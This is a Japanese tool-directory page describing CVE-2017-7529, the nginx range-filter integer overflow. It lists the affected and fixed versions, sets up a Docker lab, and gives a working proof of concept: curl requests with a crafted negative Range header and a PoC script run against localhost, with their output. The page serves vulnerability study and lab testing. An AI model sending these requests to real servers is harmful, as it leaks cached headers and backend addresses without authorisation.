Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-7529 | Kitploit
ツール/GitHubGitHub/liusec/cve-2017-7529
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubliusec/cve-2017-7529

CVE-2017-7529

リポジトリを見る
1689年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Nginx整数オーバーフロー脆弱性 CVE-2017-7529

脆弱性情報

nginx標準モジュールを使用する場合、攻撃者は悪意を持って構築された range フィールドを含むヘッダーリクエストを送信することで、レスポンス内のキャッシュファイルヘッダー情報を取得できます。一部の設定では、キャッシュファイルヘッダーにバックエンドサーバーのIPアドレスやその他の機密情報が含まれる可能性があり、情報漏洩につながります。

参考:【脆弱性分析】Nginx range フィルタ整数オーバーフロー脆弱性 (CVE–2017–7529) 早期警告分析

脆弱性の影響

本脆弱性は、0.5.6 - 1.13.2バージョン内のデフォルト設定モジュールを使用するすべてのNginxに影響します。キャッシュを有効にしているだけで、攻撃者は悪意のあるリクエストを送信してリモート攻撃を行い、情報漏洩を引き起こす可能性があります。

Nginxサーバーがプロキシキャッシュを使用している場合、攻撃者はこの脆弱性を利用して、サーバーのバックエンドの実IPアドレスやその他の機密情報を取得できます。

私たちの分析により、この脆弱性は悪用難易度が低く、low-hanging-fruit に分類される脆弱性であり、実際のネットワーク攻撃においても一定の悪用価値があると判断されました。

影響を受けるバージョン

Nginx version 0.5.6 - 1.13.2

修正バージョン

Nginx version 1.13.3, 1.12.1

環境の構築:

  1. イメージをローカルにプルします
root@kitploit:~
$ docker pull medicean/vulapps:n_nginx_1
  1. 環境を起動します
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:n_nginx_1

-p 8000:80 の前の 8000 は物理マシンのポートを表し、任意に指定できます。

使用方法と悪用方法

POC

  1. キャッシュファイルにアクセスして Content-Length を取得します。ここでは /proxy/demo.png を例とします:
root@kitploit:~
$ curl -I http://127.0.0.1:8000/proxy/demo.png

HTTP/1.1 200 OK
Server: nginx/1.13.1
Date: Wed, 12 Jul 2017 15:57:57 GMT
Content-Type: image/png
Content-Length: 16585
Connection: keep-alive
Last-Modified: Wed, 12 Jul 2017 15:57:57 GMT
ETag: W/"40c9-5543e4fad0d40"
X-Proxy-Cache:: MISS
Accept-Ranges: bytes

Content-Length: 16585 が表示されたら、この数値より大きい値、例えば 17208 を選択します。2番目の range 値は 0x8000000000000000-17208、すなわち 9223372036854758600 です。

  1. リクエスト時に range を以下のように設定します:
root@kitploit:~
$ curl -i http://127.0.0.1:8000/proxy/demo.png -r -17208,-9223372036854758600

結果:

PoC スクリプト

root@kitploit:~
$ python poc.py http://127.0.0.1:8000/proxy/demo.png

Vulnerable: http://127.0.0.1:8000/proxy/demo.png

参考リンク

  • 【脆弱性分析】Nginx range フィルタ整数オーバーフロー脆弱性 (CVE–2017–7529) 早期警告分析
  • CVE-2017-7529 Nginx整数オーバーフロー脆弱性分析
ツールをダウンロード